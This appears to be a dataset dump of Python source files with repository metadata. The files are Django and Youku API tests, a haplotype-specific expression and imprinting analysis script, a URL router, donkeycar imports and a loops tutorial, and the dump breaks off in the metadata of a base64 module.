hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ab9dd6f296e330b5dfe57858dfcb987488e38617 | 1,677 | py | Python | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | 3 | 2020-08-25T18:19:42.000Z | 2022-02-13T19:39:19.000Z | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APIClient
from api.models import Category
category_URL = reverse('api:category-list')
class PublicTestCase(TestCase):
    """
    Tests for the publicly available (unauthenticated) category API.
    """

    def setUp(self):
        # Deliberately unauthenticated client: no credentials attached.
        self.client = APIClient()

    def test_login_required(self):
        """
        Tests that login is required for retrieving categories.
        """
        res = self.client.get(category_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class ModelTests(TestCase):
    """
    Tests for the Category model's recursive string representation.
    """

    def setUp(self):
        # create_user(username, password) — positional signature used by
        # the project's custom user model.
        self.user = get_user_model().objects.create_user(
            'testuser',
            'supertest'
        )
        self.client = APIClient()

    def test_retrieve_recursed_category_name(self):
        """
        str(category) should chain all ancestor names with ' - ',
        walking up through parent_category links.
        """
        category1 = Category.objects.create(name='category1',
                                            user=self.user)
        category2 = Category.objects.create(name='category2',
                                            user=self.user,
                                            parent_category=category1)
        category3 = Category.objects.create(name='category3',
                                            user=self.user,
                                            parent_category=category2)
        # Use the idiomatic str() builtin instead of calling __str__ directly.
        self.assertEqual(str(category1), 'category1')
        self.assertEqual(str(category2), 'category1 - category2')
        self.assertEqual(str(category3), 'category1 - category2 - category3')
| 27.048387 | 71 | 0.618366 |
ab9e9c2eada36636bd43aa94268d3aee76259f10 | 1,989 | py | Python | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 106 | 2015-01-18T09:02:44.000Z | 2020-10-23T14:32:16.000Z | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 6 | 2016-10-16T14:17:47.000Z | 2019-09-26T16:42:13.000Z | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 25 | 2015-01-24T03:01:07.000Z | 2020-05-04T12:23:28.000Z | # -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import unittest
from config import *
from youku import YoukuUsers
class UserTest(unittest.TestCase):
    """
    Integration tests for YoukuUsers.

    NOTE(review): these tests hit the live Youku API and require CLIENT_ID
    and ACCESS_TOKEN from config; they will fail offline or with expired
    credentials. The literal user ids / names are real accounts the tests
    depend on.
    """

    def setUp(self):
        self.youku = YoukuUsers(CLIENT_ID)

    def test_my_info(self):
        me = self.youku.my_info(ACCESS_TOKEN)
        self.assertIn('id', me)

    def test_by_id(self):
        user = self.youku.find_user_by_id('419384312')
        self.assertEqual(user['name'], u'韩国恺')

    def test_by_ids(self):
        users = self.youku.find_users_by_ids('419384312,155482632')
        self.assertEqual(users['total'], 2)

    def test_by_name(self):
        user = self.youku.find_user_by_name(u'GDGBeijing')
        self.assertEqual(user['id'], '155482632')

    def test_by_names(self):
        users = self.youku.find_users_by_names(u'GDGBeijing,韩国恺')
        self.assertEqual(users['total'], 2)

    def test_friendship_followings(self):
        users = self.youku.friendship_followings(user_id='419384312')
        self.assertIn('total', users)

    def test_friendship_followers(self):
        users = self.youku.friendship_followers(user_name='GDGBeijing')
        self.assertIn('total', users)

    def test_friendship_create_destroy(self):
        # No explicit assertion: passes as long as neither call raises.
        self.youku.create_friendship(ACCESS_TOKEN, user_name='GDGBeijing')
        self.youku.destroy_friendship(ACCESS_TOKEN, user_name='GDGBeijing')

    def test_subscribe_create_cancel(self):
        self.assertTrue(self.youku.create_subscribe(ACCESS_TOKEN,
                                                    '2a7260de1faa11e097c0'))
        self.assertTrue(self.youku.cancel_subscribe(ACCESS_TOKEN,
                                                    '2a7260de1faa11e097c0'))

    def test_subscribe_get(self):
        self.assertIn('total', self.youku.subscribe_get(ACCESS_TOKEN))

    def test_subscribe_notice(self):
        self.assertIn('total', self.youku.subscribe_notice(ACCESS_TOKEN))
# Allow running this module directly: python test_users.py
if __name__ == '__main__':
    unittest.main()
| 32.606557 | 79 | 0.685772 |
aba0d165ccc8910e46a4f5ec4ae38db5c9961875 | 26,044 | py | Python | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | 3 | 2021-03-25T08:26:18.000Z | 2022-01-05T08:45:42.000Z | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | null | null | null | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | 1 | 2021-05-14T21:28:42.000Z | 2021-05-14T21:28:42.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 13 12:12:25 2021
@author: Jordan
"""
import sys
import os
import numpy as np
import pandas as pd
import seaborn as sns
import tempfile
import gc
import re
import collections
import gzip
import bisect
import pickle
import itertools
import math
sns.set_style('whitegrid')
# make 2 maps:
# - from transcript ID to row numbers of corresponding haplotype specific transcripts
# - from cluster ID to corresponding transcript IDs
def row_dicts(tab):
    """Build two lookup tables from an rpvg expression table.

    Returns a pair:
      * transcript ID -> list of row indices of its haplotype-specific
        transcripts (the Name column is "<tx_id>_<haplotype>"),
      * cluster ID -> sorted list of transcript IDs in that cluster.
    """
    tx_rows = collections.defaultdict(list)
    cluster_members = collections.defaultdict(set)
    for row, (hst_name, cluster) in enumerate(zip(tab.Name.values,
                                                  tab.ClusterID.values)):
        transcript = hst_name.split("_")[0]
        tx_rows[transcript].append(row)
        cluster_members[cluster].add(transcript)
    # Sort each cluster's members for deterministic downstream iteration.
    cluster_txs = {cluster: sorted(members)
                   for cluster, members in cluster_members.items()}
    # Return plain dicts so missing keys raise KeyError as before.
    return dict(tx_rows), cluster_txs
def gene_to_row_dict(tx_rows):
    """
    Map each gene ID to the table row indices of its haplotype-specific
    transcripts.

    NOTE(review): iterates the module-level global ``tx_id_to_gene`` (which
    is only populated inside the ``__main__`` block after GTF parsing), not
    just its argument — calling this earlier yields a NameError. Confirm
    this coupling is intended.
    """
    gene_to_tx_rows = {}
    for tx_id in tx_id_to_gene:
        gene = tx_id_to_gene[tx_id]
        if gene not in gene_to_tx_rows:
            gene_to_tx_rows[gene] = []
        # Genes whose transcripts have no expression rows still get an
        # (empty) entry.
        if tx_id in tx_rows:
            gene_to_tx_rows[gene].extend(tx_rows[tx_id])
    return gene_to_tx_rows
def parse_attr(attr):
    """Parse a GTF attribute column into a tag -> value dict.

    Entries look like ``gene_id "ENSG..."; gene_name "FOO";``. Quotes are
    stripped and each tag maps to its (unquoted) value.
    """
    attrs = {}
    for entry in attr.split(";"):
        tokens = entry.strip().replace("\"", "").split()
        if len(tokens) == 0:
            continue
        # Join the remaining tokens so quoted values that contain spaces
        # (legal in GTF) don't crash the previous 2-tuple unpack.
        attrs[tokens[0]] = " ".join(tokens[1:])
    return attrs
def get_haplotypes(chrom, start, end, sample, genotypes):
    """Return phase blocks of a sample's alleles over a genomic interval.

    genotypes must be a DataFrame sorted by (CHROM, POS) with REF/ALT
    columns and one genotype column per sample. Each phase block is a dict
    mapping POS -> (allele_1, allele_2); a new block is started at every
    unphased genotype, while consecutive phased genotypes share a block.
    Non-numeric allele codes (e.g. ".") are recorded as empty strings.
    """
    # Binary-search the sorted table for the chromosome, then the interval.
    chrom_start = bisect.bisect_left(genotypes.CHROM.values, chrom)
    chrom_end = bisect.bisect_right(genotypes.CHROM.values, chrom)
    region_start = bisect.bisect_left(genotypes.POS.values, start, chrom_start, chrom_end)
    region_end = bisect.bisect_right(genotypes.POS.values, end, chrom_start, chrom_end)
    blocks = []
    for i in range(region_start, region_end):
        genotype = genotypes[sample].values[i]
        phased = "|" in genotype
        if len(blocks) == 0 or not phased:
            blocks.append({})
        # BUG FIX: the original split on "|" or a literal backslash, but VCF
        # unphased genotypes are "/"-separated, so e.g. "0/1" failed to
        # split and crashed the unpack. Accept both "|" and "/".
        al1, al2 = re.split(r"[|/]", genotype)
        formatted_alleles = []
        for al in (al1, al2):
            fal = ""
            if al.isdigit():
                j = int(al)
                if j == 0:
                    fal = genotypes.REF.values[i]
                else:
                    # ALT is comma-separated for multi-allelic sites;
                    # allele code j selects the (j-1)-th alternative.
                    fal = genotypes.ALT.values[i].split(",")[j - 1]
            formatted_alleles.append(fal)
        blocks[-1][genotypes.POS.values[i]] = tuple(formatted_alleles)
    return blocks
if __name__ == "__main__":
    # Usage: imprinting_analysis.py GTF FOCAL_GENES RPVG_TABS GIBBS_TABS \
    #            HST_VARIANT_LIST VCF_LIST VARIANT_TABLE OUT_DIR
    assert(len(sys.argv) == 9)
    # gencode annotations
    gtf = sys.argv[1]
    # list of genes we're interested in
    focal_genes = sys.argv[2]
    # structured string in format SAMPLE1:rpvg_table1,SAMPLE2:rpvg_table2
    tab_string = sys.argv[3]
    # structured string in format SAMPLE1:sorted_gibbs_table1,SAMPLE2:sorted_gibbs_table2
    gibbs_string = sys.argv[4]
    # file constaining list of hst to variant files
    hst_variant_list = sys.argv[5]
    # file containing list of VCFs (probably reduced to these samples)
    vcf_list = sys.argv[6]
    # variants for the focal genes in one table
    variant_table = sys.argv[7]
    # directory for output
    out_dir = sys.argv[8]
    # Parse SAMPLE:path pairs; tabs[i] belongs to samples[i].
    tabs = []
    samples = []
    for tab_sample in tab_string.split(","):
        assert(":" in tab_sample)
        samp, tab = tab_sample.split(":")
        tabs.append(tab)
        samples.append(samp)
    gibbs_tabs = []
    gibbs_samples = []
    for tab_sample in gibbs_string.split(","):
        assert(":" in tab_sample)
        samp, tab = tab_sample.split(":")
        gibbs_tabs.append(tab)
        gibbs_samples.append(samp)
    # The two sample lists must agree element-wise (same order).
    assert(samples == gibbs_samples)
    # Fail fast on missing inputs before doing any heavy work.
    assert(os.path.isdir(out_dir))
    assert(os.path.exists(gtf))
    assert(os.path.exists(focal_genes))
    assert(os.path.exists(vcf_list))
    for tab in tabs:
        assert(os.path.exists(tab))
    for tab in gibbs_tabs:
        assert(os.path.exists(tab))
    vcfs = []
    with open(vcf_list) as f:
        for line in f:
            if type(line) == bytes:
                line = line.decode("utf-8")
            vcf = line.strip()
            assert(os.path.exists(vcf))
            vcfs.append(vcf)
    # make a look table for the file name by chromosome: peek at the first
    # data row of each HST-variant file to learn which chromosome it covers
    hst_variant_files = {}
    with open(hst_variant_list) as f:
        for line in f:
            if type(line) == bytes:
                line = line.decode("utf-8")
            fname = line.strip()
            with open(fname) as hst_f:
                #skip the header
                next(hst_f)
                hst_line = next(hst_f)
                if type(hst_line) == bytes:
                    hst_line = hst_line.decode("utf-8")
                hst_variant_files[hst_line.split()[0]] = fname
    # Scratch directory; cleaned up automatically when tmpdir is GC'd.
    tmpdir = tempfile.TemporaryDirectory()
    tmppref = tmpdir.name
###############
focal_genes_set = set()
for line in open(focal_genes):
if type(line) == bytes:
line = line.decode("utf-8")
focal_genes_set.add(line.strip().split()[0])
###############
# load the GTF
gencode = pd.read_csv(gtf, sep = "\t", header = None, skiprows = list(range(5)))
gencode.columns = ["chr", "src", "type", "start", "end", "score", "strand", "frame", "attr"]
gencode['chr'] = gencode['chr'].apply(str)
###############
print("loading gene annotations...", file = sys.stderr)
# parse the GTF into useful indexes
gene_coords = {}
tx_models = {}
tx_id_to_name = {}
tx_id_to_gene = {}
exonic_regions = {}
for i in range(gencode.shape[0]):
attrs = parse_attr(gencode.attr.values[i])
gene = attrs["gene_id"]
if gene not in tx_models:
tx_models[gene] = {}
chrom = gencode.chr.values[i]
if chrom.startswith("chr"):
chrom = chrom[3:]
if gene in tx_models:
if gencode.type.values[i] == "gene":
gene_coords[gene] = (chrom, gencode.start.values[i], gencode.end.values[i])
elif gencode.type.values[i] == "exon":
tx_id = attrs["transcript_id"]
if tx_id not in tx_models[gene]:
tx_models[gene][tx_id] = []
tx_models[gene][tx_id].append((chrom, gencode.start.values[i], gencode.end.values[i]))
###############
tx_id_to_gene[tx_id] = gene
###############
if "transcript_id" in attrs and "transcript_name" in attrs:
tx_id_to_name[attrs["transcript_id"]] = attrs["transcript_name"]
###############
if gencode.type.values[i] == "exon":
if chrom not in exonic_regions:
exonic_regions[chrom] = []
exonic_regions[chrom].append([gencode.start.values[i], gencode.end.values[i]])
###############
# reverse the transcript gene table
gene_to_tx_ids = {}
for tx_id in tx_id_to_gene:
gene = tx_id_to_gene[tx_id]
if gene not in gene_to_tx_ids:
gene_to_tx_ids[gene] = []
gene_to_tx_ids[gene].append(tx_id)
###############
all_genes = sorted(gene_to_tx_ids)
###############
# collapse the exonic regions that overlap
for chrom in exonic_regions:
i, j = 0, 0
intervals = exonic_regions[chrom]
intervals.sort()
while j < len(intervals):
if intervals[j][0] <= intervals[i][1]:
intervals[i][1] = max(intervals[i][1], intervals[j][1])
else:
i += 1
intervals[i] = intervals[j]
j += 1
while len(intervals) > i + 1:
intervals.pop()
###############
# this is a big table and we don't need it any more, clear it out
del gencode
gc.collect()
###############
print("computing credible intervals...", file = sys.stderr)
sample_tx_cred_intervals = {}
for samp, tab in zip(gibbs_samples, gibbs_tabs):
tx_cred_intervals = []
sample_tx_cred_intervals[samp] = tx_cred_intervals
def record_cred_interval(hst_exprs, credibility):
if len(hst_exprs) == 0:
return
for hst1, hst2 in sorted(set(tuple(sorted(pair)) for pair in itertools.combinations(hst_exprs, 2))):
ratios = []
hst1_expr = hst_exprs[hst1]
hst2_expr = hst_exprs[hst2]
assert(len(hst1_expr) == len(hst2_expr))
for i in range(len(hst1_expr)):
if hst1_expr[i] == 0.0 or hst2_expr[i] == 0.0:
# log ratio undefined if either is 0
continue
ratios.append(math.log(hst1_expr[i] / hst2_expr[i], 2.0))
if len(ratios) == 0:
continue
# find the credible interval
ratios.sort()
i1 = min(int(round(len(ratios) * (1.0 - credibility) / 2.0)), len(ratios) - 1)
i2 = min(int(round(len(ratios) * (1.0 - (1.0 - credibility) / 2.0))), len(ratios) - 1)
r1 = ratios[i1]
r2 = ratios[i2]
tx_cred_intervals.append((hst1, hst2, r1, r2))
# take either gzip or unzipped file
f = None
if tab.endswith(".gz"):
f = gzip.open(tab)
else:
f = open(tab)
# the credibility i'm using
credibility = .9
curr_tx = None
hst_gibbs_exprs = None
txs_seen = set()
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
if line.startswith("Name"):
# skip the header
continue
tokens = line.split()
hst = tokens[0]
tx = hst.split("_")[0]
if tx != curr_tx:
# were on to a new transcript, make sure we haven't seen it before
assert(tx not in txs_seen)
txs_seen.add(tx)
if curr_tx is not None:
# record the ratios of the HSTs for the previous transcript
record_cred_interval(hst_gibbs_exprs, credibility)
# fresh data structures for this transcript
curr_tx = tx
hst_gibbs_exprs = {}
# record the row of expression values
hst_gibbs_exprs[hst] = [float(tokens[i]) for i in range(2, len(tokens))]
if curr_tx is not None:
# the final transcript
record_cred_interval(hst_gibbs_exprs, credibility)
sample_tx_cred_intervals_output = os.path.join(out_dir, "sample_tx_cred_intervals.pkl")
with open(sample_tx_cred_intervals_output, "wb") as f:
pickle.dump(sample_tx_cred_intervals, f)
###############
print("loading genotypes...", file = sys.stderr)
genotypes = pd.read_csv(variant_table, sep = "\t")
genotypes['CHROM'] = genotypes['CHROM'].apply(str)
genotypes.sort_values(["CHROM", "POS"], inplace = True)
genotypes = genotypes.loc[np.invert(genotypes.duplicated()),:]
#################
print("loading HST variants...", file = sys.stderr)
hst_variants = {}
for hst_file in hst_variant_files.values():
hst_table = pd.read_csv(hst_file, sep = "\t", header = 0)
hst_table['Chrom'] = hst_table['Chrom'].apply(str)
for i in range(hst_table.shape[0]):
if type(hst_table.HSTs.values[i]) == float:
# this seems to happen when the list of HSTs is empty
continue
hsts = hst_table.HSTs.values[i].split(",")
for hst in hsts:
tx = hst.split("_")[0]
gene = tx_id_to_gene[tx]
if not gene in focal_genes_set:
continue
if not hst in hst_variants:
hst_variants[hst] = []
var = (hst_table.Pos.values[i], hst_table.Allele.values[i])
hst_variants[hst].append(var)
del hst_table
gc.collect()
#################
sample_higher_haplo_expr = {}
sample_lower_haplo_expr = {}
sample_informative_expr = {}
sample_haplo_1_is_higher = {}
sample_haplo_hsts = {}
for i in range(len(tabs)):
sample = samples[i]
tab = tabs[i]
print("computing haplotype expression for sample {}...".format(sample), file = sys.stderr)
sample_expr = pd.read_csv(tab, sep = "\t")
sample_tx_rows, sample_cluster_txs = row_dicts(sample_expr)
higher_haplo_expr = {}
lower_haplo_expr = {}
informative_expr = {}
haplo_1_is_higher = {}
haplo_hsts = {}
sample_higher_haplo_expr[sample] = higher_haplo_expr
sample_lower_haplo_expr[sample] = lower_haplo_expr
sample_informative_expr[sample] = informative_expr
sample_haplo_1_is_higher[sample] = haplo_1_is_higher
sample_haplo_hsts[sample] = haplo_hsts
for gene in focal_genes_set:
chrom, start, end = gene_coords[gene]
blocks = get_haplotypes(chrom, start, end, sample, genotypes)
if len(blocks) > 1:
print("sample {} has {} phase blocks on gene {}, skipping".format(sample, len(blocks), gene), file = sys.stderr)
continue
block = blocks[0]
if not gene in higher_haplo_expr:
higher_haplo_expr[gene] = {}
lower_haplo_expr[gene] = {}
informative_expr[gene] = {}
gene_higher_haplo_expr = higher_haplo_expr[gene]
gene_lower_haplo_expr = lower_haplo_expr[gene]
gene_informative_expr = informative_expr[gene]
haplo_1_expr = {}
haplo_2_expr = {}
for tx_id in gene_to_tx_ids[gene]:
haplo_1_expr[tx_id] = 0.0
haplo_2_expr[tx_id] = 0.0
total_informative_expr = 0.0
haplo_hsts[tx_id] = [None, None]
for i in sample_tx_rows[tx_id]:
ex = sample_expr.TPM.values[i]
hst = sample_expr.Name.values[i]
match_1 = True
match_2 = True
for pos, allele in hst_variants[hst]:
hap_1, hap_2 = block[pos]
match_1 = match_1 and allele == hap_1
match_2 = match_2 and allele == hap_2
if match_1 and not match_2:
haplo_hsts[tx_id][0] = hst
haplo_1_expr[tx_id] += ex
elif match_2 and not match_1:
haplo_hsts[tx_id][1] = hst
haplo_2_expr[tx_id] += ex
if not (match_1 and match_2):
total_informative_expr += ex
if not tx_id in gene_informative_expr:
gene_informative_expr[tx_id] = []
gene_informative_expr[tx_id].append(total_informative_expr)
if sum(haplo_1_expr.values()) > sum(haplo_2_expr.values()):
higher = haplo_1_expr
lower = haplo_2_expr
haplo_1_is_higher[gene] = True
else:
lower = haplo_1_expr
higher = haplo_2_expr
haplo_1_is_higher[gene] = False
for tx_id in higher:
if not tx_id in gene_higher_haplo_expr:
gene_higher_haplo_expr[tx_id] = []
gene_lower_haplo_expr[tx_id] = []
gene_higher_haplo_expr[tx_id].append(higher[tx_id])
gene_lower_haplo_expr[tx_id].append(lower[tx_id])
#################
higher_haplo_output = os.path.join(out_dir, "sample_higher_haplo_expr.pkl")
with open(higher_haplo_output, "wb") as f:
pickle.dump(sample_higher_haplo_expr, f)
lower_haplo_output = os.path.join(out_dir, "sample_lower_haplo_expr.pkl")
with open(lower_haplo_output, "wb") as f:
pickle.dump(sample_lower_haplo_expr, f)
informative_output = os.path.join(out_dir, "sample_informative_expr.pkl")
with open(informative_output, "wb") as f:
pickle.dump(sample_informative_expr, f)
which_haplo_output = os.path.join(out_dir, "sample_haplo_1_is_higher.pkl")
with open(which_haplo_output, "wb") as f:
pickle.dump(sample_haplo_1_is_higher, f)
haplo_hsts_output = os.path.join(out_dir, "sample_haplo_hsts.pkl")
with open(haplo_hsts_output, "wb") as f:
pickle.dump(sample_haplo_hsts, f)
###############
print("identifying heterozygous variants...", file = sys.stderr)
inf = 2**62
het_positions = {}
for vcf in vcfs:
with gzip.open(vcf) as f:
samps = None
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
if line.startswith("##"):
continue
if line.startswith("#"):
samps = line.rstrip().split("\t")[9:]
for sample in samps:
if sample not in het_positions:
het_positions[sample] = set()
else:
tokens = line.rstrip().split("\t")
assert(len(tokens) == len(samps) + 9)
chrom_exonic_regions = exonic_regions[tokens[0]]
chrom = tokens[0]
pos = int(tokens[1])
idx = bisect.bisect(chrom_exonic_regions, [pos, inf])
if idx == 0:
# before the first exon
continue
elif chrom_exonic_regions[idx - 1][1] < pos:
# in between exons
continue
for i in range(9, len(tokens)):
genotype = tokens[i]
samp = samps[i - 9]
if "|" in genotype or "\\" in genotype:
al1, al2 = re.split("[\\|\\\\]", genotype)
if al1 != al2:
het_positions[samp].add((chrom, pos))
gc.collect()
###############
all_gene_intervals = sorted((interval[0], interval[1], interval[2], gene) for gene, interval in gene_coords.items())
sample_het_balance = {}
for i in range(len(tabs)):
tab = tabs[i]
sample = samples[i]
if sample not in sample_het_balance:
sample_het_balance[sample] = {}
het_balance = sample_het_balance[sample]
print("computing balance for sample {}".format(sample), file = sys.stderr)
buffer = collections.deque()
prev_chrom = None
tokens = None
pos = None
filesize = None
hst_file = None
gene_num = 0
sample_expr = pd.read_csv(tab, sep = "\t")
sample_tx_rows, sample_cluster_txs = row_dicts(sample_expr)
for chrom, start, end, gene in all_gene_intervals:
gene_num += 1
if gene_num % 2500 == 0:
print("processing gene {}".format(gene_num), file = sys.stderr)
gene_hst_variants = {}
if prev_chrom != chrom:
# we've switched chromosomes to a new file
if not chrom in hst_variant_files:
continue
hst_table = hst_variant_files[chrom]
#print("starting chrom {}".format(chrom), file = sys.stderr)
hst_file = open(hst_table)
filesize = os.fstat(hst_file.fileno()).st_size
# skip the header
hst_file.readline()
buffer.clear()
tell = hst_file.tell()
prev_pos = -1
tokens = hst_file.readline().strip().split()
var_chrom = tokens[0]
pos = int(tokens[1])
buffer.append((pos, tell))
# advance through rows that are strictly before this gene
while pos < start:
tell = hst_file.tell()
if tell == filesize:
break
prev_pos = pos
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
if pos != prev_pos:
buffer.append((pos, tell))
# remove any part of the buffer before this gene
while len(buffer) > 0:
buf_pos = buffer[0][0]
if buf_pos < start:
buffer.popleft()
else:
break
if len(buffer) > 0:
# everything before the start has been removed, except the current row
buf_pos, tell = buffer[0]
if buf_pos < pos:
# this occurred strictly before the current row, so we need to seek
# backwards
# reset the part of the buffer to the right of where we're seeking to
while len(buffer) > 1:
buffer.pop()
hst_file.seek(tell)
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
hst_vars = {}
# iterate over rows in the gene
while pos <= end:
if len(tokens) >= 5:
allele = tokens[3]
pos = int(tokens[1])
hsts = tokens[4].split(",")
for hst in hsts:
if hst not in hst_vars:
hst_vars[hst] = []
hst_vars[hst].append((pos, allele))
tell = hst_file.tell()
if tell == filesize:
# we hit the end of the file
break
prev_pos = pos
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
if pos != prev_pos:
# this is the first row we've seen with this position, remember
# it in the buffer
buffer.append((pos, tell))
prev_chrom = chrom
if gene not in het_balance:
het_balance[gene] = []
var_expr = {}
if gene not in gene_to_tx_ids:
continue
for tx_id in gene_to_tx_ids[gene]:
#print("looking at expression for tx " + tx_id, file = sys.stderr)
if tx_id not in sample_tx_rows:
continue
for i in sample_tx_rows[tx_id]:
ex = sample_expr.TPM.values[i]
if ex == 0.0:
continue
hst = sample_expr.Name.values[i]
#print("\thst " + hst + " has positive expression " + str(ex), file = sys.stderr)
if hst not in hst_vars:
# must not overlap any variants
continue
for var in hst_vars[hst]:
if var not in var_expr:
var_expr[var] = 0.0
var_expr[var] += ex
alleles = {}
for pos, allele in var_expr:
if pos not in alleles:
alleles[pos] = []
alleles[pos].append(allele)
for pos in alleles:
if (chrom, pos) not in het_positions[sample]:
continue
#print("looking at expression for pos " + chrom + " " + str(pos), file = sys.stderr)
total_expr = sum(var_expr[(pos, allele)] for allele in alleles[pos])
highest_expr = max(var_expr[(pos, allele)] for allele in alleles[pos])
#print("highest expr " + str(highest_expr) + ", total " + str(total_expr), file = sys.stderr)
het_balance[gene].append((highest_expr, total_expr))
del sample_expr
del sample_tx_rows
del sample_cluster_txs
gc.collect()
#################
balance_output = os.path.join(out_dir, "sample_het_balance.pkl")
with open(balance_output, "wb") as f:
pickle.dump(sample_het_balance, f)
tx_models_output = os.path.join(out_dir, "tx_models.pkl")
with open(tx_models_output, "wb") as f:
pickle.dump(tx_models, f)
tx_id_to_name_output = os.path.join(out_dir, "tx_id_to_name.pkl")
with open(tx_id_to_name_output, "wb") as f:
pickle.dump(tx_id_to_name, f)
| 35.05249 | 128 | 0.507986 |
aba36294bade63b92b2258cf8156dbcd7056f857 | 173 | py | Python | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | null | null | null | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | 1 | 2021-09-25T20:53:22.000Z | 2021-09-25T20:53:22.000Z | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | null | null | null |
from rest_framework.routers import DefaultRouter

from .views import UserViewSet

# Register the user endpoints under the "users/" prefix; the router
# generates list/detail/create/update/delete routes from the viewset.
router = DefaultRouter()
router.register('users', UserViewSet)

# Exposed for inclusion in the project-level urlconf.
urlpatterns = router.urls
| 17.3 | 48 | 0.809249 |
aba3ca3cb2abe792a4ee6dcd8344c35aa3650122 | 430 | py | Python | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 12 | 2019-05-28T17:57:57.000Z | 2022-01-14T14:46:30.000Z | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 7 | 2019-12-16T22:09:49.000Z | 2021-09-12T15:35:41.000Z | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 2 | 2021-01-24T15:31:57.000Z | 2021-07-28T17:23:29.000Z | from donkeycar.parts.model_wrappers.Angle5FlipSharpThrottleOn import Angle5FlipSharpThrottleOn
from donkeycar.parts.model_wrappers.Angle5ifelse import Angle5ifelse
from donkeycar.parts.model_wrappers.Angle3ifelse import Angle3ifelse
from donkeycar.parts.model_wrappers.Angle3speedy import SpeedyFranklin3choices
from donkeycar.parts.model_wrappers.Angle51 import Angle51
from donkeycar.parts.model_wrappers.Angle52 import Angle52
| 61.428571 | 94 | 0.902326 |
aba42aace3da5a22bb64d7c6415ae3217f5a8a2c | 589 | py | Python | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | my_list = ['banana', 'strawberry', 'apple', 'watermelon', 'peach'] #a simple list
sorted_list = sorted(my_list) #python includes powerful sorting algorithms
for x in range(1,11,1): #a for loop which counts to ten
"""range takes up to three arguments: the start, which is
inclusive, the end, which is exclusive and the step size"""
print(x)
print() #prints an empty line
for y in range(10,0,-1): #the step size can also be negative to count backwards
print(y)
print()
for z in range(len(sorted_list)): #you can also iterate over lists
print (sorted_list[z])#prints the list
| 45.307692 | 81 | 0.718166 |
aba5a20bb67be074c4810bf3da7c2a271409d71b | 2,146 | py | Python | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
